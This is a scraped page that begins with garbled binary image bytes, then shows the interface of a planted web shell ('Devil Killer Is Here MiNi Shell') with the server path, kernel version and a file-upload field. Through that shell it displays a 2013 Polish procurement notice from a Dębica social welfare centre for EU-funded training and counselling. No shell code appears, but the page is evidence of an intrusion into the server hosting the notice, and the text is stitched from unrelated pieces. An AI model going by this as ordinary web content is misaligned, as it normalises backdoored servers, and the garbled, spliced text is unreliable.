JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130426/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130426/167854-N-2013.html

<p class="kh_header"><b>Dębica: Organizacja i przeprowadzenie usług szkoleniowych w zakresie rozwoju osobistego, współfinansowanych ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej</b><br>
<b>Numer ogłoszenia: 167854 - 2013; data zamieszczenia: 26.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Akademicka 12, 39-200 Dębica, woj. podkarpackie, tel. 0-14 6813590,6813591,6705006, faks 0-14 6705006.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops-debica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie usług szkoleniowych w zakresie rozwoju osobistego, współfinansowanych ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Organizacja i przeprowadzenie usług szkoleniowych w zakresie rozwoju osobistego, współfinansowanych ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
2.Przedmiot zamówienia całkowicie finansowany ze środków publicznych.
3.Przedmiot zamówienia kierowany do osób zameldowanych w mieście Dębica, korzystających z pomocy Miejskiego Ośrodka Pomocy Społecznej, które nie pracują i są w wieku aktywności zawodowej.
4.Oznaczenie według Wspólnego Słownika Zamówień 80-57-00-00-0 Usługi szkolenia w dziedzinie rozwoju osobistego. 
5.Szczegółowy opis przedmiotu zamówienia:

5.1.Warsztaty umiejętności kompetencji wychowawczych dla rodziców: 

5.1.1.Uczestnikami będzie 7 osób tj. rodziców dzieci będących uczestnikami Placówek Wsparcia Dziennego - Świetlic, rekrutowani przez Zamawiającego. 
5.1.2.Czas trwania - 24 godz. - 1 godzina zajęć to godzina zegarowa (60 min.) obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę 15 min. Jeden raz w tygodniu (w dniach od poniedziałku do piątku) maksymalnie 2 godziny dziennie, w Świetlicy należącej do Zamawiającego. 
5.1.3.Warsztaty obejmują następujący zakres:

1)rozpoznawanie, wyrażanie i akceptowanie uczuć,
2)aktywne słuchanie,
3)motywowanie dziecka do współdziałania, 
4)kształtowanie i doskonalenie umiejętności wychowawczych,
5)umiejętność patrzenia na świat oczami dziecka by pomóc rozwiązać konflikty,
6)modyfikowanie niepożądanych lub nieodpowiednich zachowań dziecka bez stosowaia przemocy, 
7)poszukiwanie skutecznych sposobów dyscyplinowania dziecka (kara, pochwała),
8)wymierzanie kary a wyciąganie konsekwencji,
9)podejmowanie dialogu z dzieckiem i zachęcanie go do współpracy, aby uzyskać założone przez siebie cele,
10)stawianie i przestrzeganie czytelnych granic;
11)poznawanie i rozumienie uczuć dziecka,
12)zachęcanie do współpracy oraz rozwiązywanie problemów i konfliktów;
13)zachęcanie do samodzielności,
14)pogłębianie więzi rodzinnych.
15)metodyka prowadzenia zajęć (do wyboru):

a)Warsztaty, ćwiczenia,
b)w grupach,
c)burza mózgów,
d)wizualizacja,
e)mini wykłady, dyskusja, odgrywanie ról itp.

5.1.4.Wykonawca zobowiązany jest zapewnić i ponieść koszty: 

1)catering podczas zajęć (kawa, herbata, woda mineralna, ciastka),
2)zakupu materiałów do realizacji zajęć warsztatowych,
3)wydania uczestnikom zaświadczenia potwierdzającego uczestnictwo w warsztatach,
4)prowadzenia dokumentacji wykonanych usług zgodnie z zasadami dokumentowania działań wykonywanych w projektach finansowanych przez Europejski Fundusz Społeczny. 

5.1.5.Termin realizacji: wrzesień - listopad 2013r.
5.1.6.Wymagania dla Wykonawcy w tym zakresie tj. osób prowadzących warsztaty):

1)Usługę tę będzie mógł świadczyć:
a)trener kontaktów interpersonalnych lub
b)psycholog lub
c)psychoterapeuta.
2)Doświadczenie w realizowaniu minimum 3 grup zajęciowych Szkoły dla rodziców, potwierdzone dowodami, że zostały zrealizowane należycie.

5.2.Indywidualne poradnictwo zawodowe:

5.2.1.Uczestnikami będą osoby zameldowane w mieście Dębica, korzystające z pomocy Miejskiego Ośrodka Pomocy Społecznej, które nie pracują i są w wieku aktywności zawodowej, tj. około 53 osób, rekrutowanych przez Zamawiającego.
5.2.2.Cel: ocena indywidualnych preferencji i predyspozycji zawodowych uczestników, ukierunkowana na dobór szkoleń i kształcenia kierunków przydatnych na lokalnym rynku pracy.
5.2.3.Indywidualne poradnictwo zawodowe świadczone będzie w godzinach pracy i w siedzibie Zamawiającego. 
5.2.4.Wykonawca zapewnia catering (kawa, herbata, woda mineralna, ciastka) oraz niezbędne materiały szkoleniowe (kserokopie druków, materiałów itp.) i piśmiennicze.
5.2.5.Przewidywana liczba poradnictwa: 1 godzina na 1 uczestnika. Godzina poradnictwa wynosi 60 min.
5.2.6.Termin realizacji: maj - lipiec 2013r.
5.2.7.Wymagania dla doradcy zawodowego:

1)Doświadczenie w pracy z osobami bezrobotnymi i wykluczonymi zawodowo przez minimum 3 lata, potwierdzone dowodami, że zostały zrealizowane należycie,
2)Doradca zawodowy musi posiadać licencję zawodową minimum I stopnia lub studia podyplomowe w zakresie doradztwa zawodowego.

5.3.Indywidualne poradnictwo specjalistyczne:

5.3.1.Uczestnikami będą osoby zameldowane w mieście Dębica, korzystające z pomocy Miejskiego Ośrodka Pomocy Społecznej, które nie pracują i są w wieku aktywności zawodowej, tj. około 45 osób. 
5.3.2.Indywidualne poradnictwo ma być świadczone przez specjalistów tj.: psychologa, pedagoga, prawnika, terapeuty ds. uzależnień w godzinach pracy i siedzibie Zamawiającego. 
5.3.3.Godzina poradnictwa wynosi 60 min. Liczba godzin jest uzależniona od indywidualnych potrzeb uczestników. 
5.3.4.Wykonawca zapewnia catering (kawa, herbata, woda mineralna, ciastka) oraz materiały szkoleniowe.
5.3.5.Termin realizacji: od września do grudnia 2013 roku.
5.3.6.Wymagania dla specjalistów:

1)Dyplom ukończenia studiów: pedagogicznych (dot. pedagoga), prawniczych (dot. prawnika), psychologa (dot. psychologa) lub inny dokument uprawniający do wykonywania ww. zawodu,
2)Świadectwo/dyplom ukończenia kursu terapii uzależnień.

5. 4.Zajęcia z uczestnikami Klubu Integracji Społecznej prowadzone przez doradcę zawodowego i psychologa w siedzibie Zamawiającego:

5.4.1.Zajęcia mają na celu zdiagnozować preferencje predyspozycje zawodowe i społeczne uczestników. Na tym etapie opracowany ma zostać plan rozwoju zawodowego i społecznego z uwzględnieniem nabywania kompetencji zawodowych, umiejętność uczenia się, rozwój kompetencji społecznych, rozwój przedsiębiorczości i inicjatywności. Tematami zajęć mają być m. in.:

1)kształtowanie umiejętności interpersonalnych i społecznych, niezbędnych do podejmowania ról społecznych i zawodowych,
2)budowanie pozytywnego wizerunku swojej osoby i komunikacja interpersonalna,
3)praca w zespole,
4)asertywność i radzenie sobie ze stresem,
5)promocja zdrowego stylu życia,
6)zarządzanie czasem i budżetem domowym,
7)budowanie poczucia wartości, identyfikacja mocnych i słabych stron osobowości,
8)autoprezentacja,
9)pozytywne myślenie,
10)analiza niepowodzeń w poszukiwaniu pracy i sposoby jej poszukiwania,
11)odkrywanie własnych umiejętności i możliwości,
12)dokumenty aplikacyjne i rozmowa kwalifikacyjna. 

5.4.2. Uczestnikami będą osoby zameldowane w mieście Dębica, korzystające z pomocy Miejskiego Ośrodka Pomocy Społecznej, które nie pracują i są w wieku aktywności zawodowej, tj. około 15 osób w jednej grupie, rekrutowane przez Zamawiającego. 
5.4.3. Wykonawca zapewnia catering (kawa, herbata, woda mineralna, ciastka) oraz niezbędne materiały szkoleniowe (kserokopie druków, materiałów itp.) i piśmiennicze.
5.4.4. Zajęcia mają być organizowane w godzinach pracy i w pomieszczeniach Zamawiającego. Godzina szkoleniowa wynosi 60 min. 1 godzina zajęć to godzina zegarowa (60 min.) obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę 15 min.
5.4.5. Liczba godzin: około 100 godzin, po 2 spotkania tygodniowo. (około 50 godzin psycholog i około 50 godzin doradca zawodowy w dwóch grupach łącznie).
5.4.6. Wydanie uczestnikom zaświadczenia potwierdzającego uczestnictwo w zajęciach
5.4.7. Termin realizacji: od lipca do września 2013 roku.
5.4.8. Wymagania dla specjalistów:

1)Doświadczenie w pracy z osobami bezrobotnymi i wykluczonymi zawodowo przez minimum 2 lata, potwierdzone dowodami, że zostały zrealizowane należycie,
2)Posiadać dyplom ukończenia studiów psychologicznych (dot. psychologa),
3)Posiadać świadectwo, dyplom ukończenia studiów w zakresie doradztwa zawodowego (dot. doradcy zawodowego).
6.Poszczególne usługi Wykonawca realizuje dla wskazanej liczby uczestników, we wskazanej liczbie godzin oraz zgodnie z ustalonym przez Zamawiającego i Wykonawcę programem. 
7.Wykonawca zobowiązuje się do:

1)prowadzenia ewidencji obecności uczestników i bieżącego informowania Zamawiającego o każdej nieobecności lub rezygnacji z uczestnictwa;
2)odebrania od uczestników potwierdzenia otrzymania materiałów szkoleniowych i cateringu, odrębnie dla każdej usługi;
3)wydania zaświadczenia 1 egz. uczestnikom oraz 1 egz. Zamawiającemu w usłudze 5.1. oraz 5.4.,
4)umieszczenia informacji o realizowanych usługach szkoleniowych w zakresie rozwoju osobistego na stronie internetowej www.inwestycjewkadry.info.pl;
5)oznaczenia pomieszczeń, w których odbywają się warsztaty, zajęcia, materiałami otrzymanymi od Zamawiającego;
6)podpisania umowy powierzenia danych osobowych uczestników;
7)umożliwienia kontroli realizacji niniejszej umowy na żądanie upoważnionej instytucji (np. Wojewódzkiego Urzędu Pracy);
8)stosowania się do pisemnych poleceń i wskazówek Zamawiającego w trakcie wykonywania przedmiotu umowy;
9)zawiadomienia Zamawiającego o zakończeniu realizacji poszczególnej części zamówienia w terminie do 7 dni od jej ukończenia i przedłożenia zestawienia dokumentów tj.: 

a)faktury bądź rachunku;
b)listy obecności uczestników;
c)potwierdzenia odbioru materiałów szkoleniowych i cateringu przez uczestników szkolenia;
d)1 egz. zaświadczenia uczestnictwa w usłudze: 5.1. oraz 5.4.
e)płyty CD ze zdjęciami z realizacji przedmiotu zamówienia (min. po 5 zdjęć z każdej usługi).

7.1.1.wykonawca jest zobowiązany do podpisania protokołu odbioru zamówienia po zakończeniu realizacji przedmiotu zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna oświadczenie złożone przez Wykonawcę, że posiada uprawnienia do wykonywania wymaganej przez Zamawiającego działalności.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli: 1- spełnia lub 0- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączony do oferty: wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, tj. realizacji co najmniej trzech usług szkoleniowych w zakresie rozwoju osobistego, o wartości co najmniej 4 000zł brutto każdy, w tym jeden ze środków dofinansowanych przez Europejski Fundusz Społeczny, w zakresie przedmiotu zamówienia określonego w Rozdziale IV ust. 5, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli: 1- spełnia lub 0- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączony do oferty: 

a)wykaz narzędzi, wyposażenia i urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;
b)wykaz osób, które będą uczestniczyły w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; 
c)oświadczenie Wykonawcy, iż osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia do realizacji przedmiotu zamówienia.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli: 1- spełnia lub 0- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli: 1- spełnia lub 0- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączone do oferty: oświadczenie Wykonawcy, iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej należyte wykonanie niniejszego zamówienia.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli: 1- spełnia lub 0- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Dowodami są:

1)poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert;
2)oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt. 1;
3)w przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie wykonanych usług, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt. 1 i 2.
4)W razie konieczności, szczególnie gdy wykaz wykonanych usług lub dowody, budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.
5)Zgodnie z § 9 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013r. poz. 231) w postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie niniejszego rozporządzenia, Wykonawca, w miejsce poświadczeń, o których mowa w § 1 ust. 2 pkt. 1 wyżej cyt. rozporządzenia, może przedkładać dokumenty potwierdzające należyte wykonanie usług zgodnie z zasadami określonymi w § 1 ust. 1 pkt. 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie wykonawcy - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany w umowie w zakresie:

1)kadry dydaktycznej tj. wprowadzenia osoby zastępującej (o kwalifikacjach równoważnych lub wyższych) w przypadku wystąpienia sytuacji niezależnych od Wykonawcy i niemożliwych do przewidzenia w dniu zawarcia umowy,
2)liczby uczestników, których Zamawiający nie mógł przewidzieć w dniu zawarcia umowy, 
3)zmiany ilości godzin usług w indywidualnym poradnictwie specjalistycznym, świadczonych przez specjalistów w zależności od potrzeb uczestników.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
